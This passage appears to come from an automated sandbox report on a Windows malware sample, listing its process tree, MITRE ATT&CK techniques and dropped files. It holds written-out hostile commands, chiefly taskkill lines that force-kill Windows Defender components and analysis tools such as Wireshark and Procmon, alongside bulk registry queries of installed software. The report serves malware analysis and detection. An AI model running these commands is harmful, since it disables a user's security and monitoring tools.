                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4920
                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4924
                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                PID:5028
                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4684
                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4240
                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:4220
                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:3624
                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:4024
                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5108
                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:4128
                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:2604
                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:2128
                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:4164
                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:3580
                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4296
                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:4216
                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:4188
                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:4344
                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4276
                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:3948
                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4416
                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:4080
                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:1152
                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:3620
                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                          PID:3848
                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:4564
                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4680
                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4620
                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:4252
                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4656
                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:4460
                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:4408
                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:4368
                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:4092
                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:3992
                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4852
                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:5024
                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:1348
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:2732
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:1204
                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:4172
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:1604
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:3048
                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:4356
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:4100
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:4452
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                    PID:4200
                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:4288
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:3836
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:1496
                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:4324
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:5064
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:4612
                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:1480
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:4916
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:4856
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:4448
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:2364
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:5076
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:1400
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:2128
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:3100
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:1224
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:4292
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:4464
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:3948
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:3088
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                              PID:1820
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:4348
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4668
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4340
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4400
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4928
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1976
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:3960
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:4920
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4392
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:4376
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:1020
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:1464
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:4572
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:4752
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:4916
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:4024
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                PID:3552

                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1158

                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1158

                                                                                                                                                                                                                                                                                                                                                            Impact

                                                                                                                                                                                                                                                                                                                                                            Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                            T1490

                                                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\.ntusernt.ini
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\hmJMe\Desktop.ini
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\hmJMe\Lwqbj.class
                                                                                                                                                                                                                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\BmVJBVVENn7684067864250260018.xml
                                                                                                                                                                                                                                                                                                                                                            • memory/60-73-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/572-78-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/572-48-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/928-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1020-266-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1064-61-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1120-83-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                            • memory/1140-149-0x0000000000000000-mapping.dmp
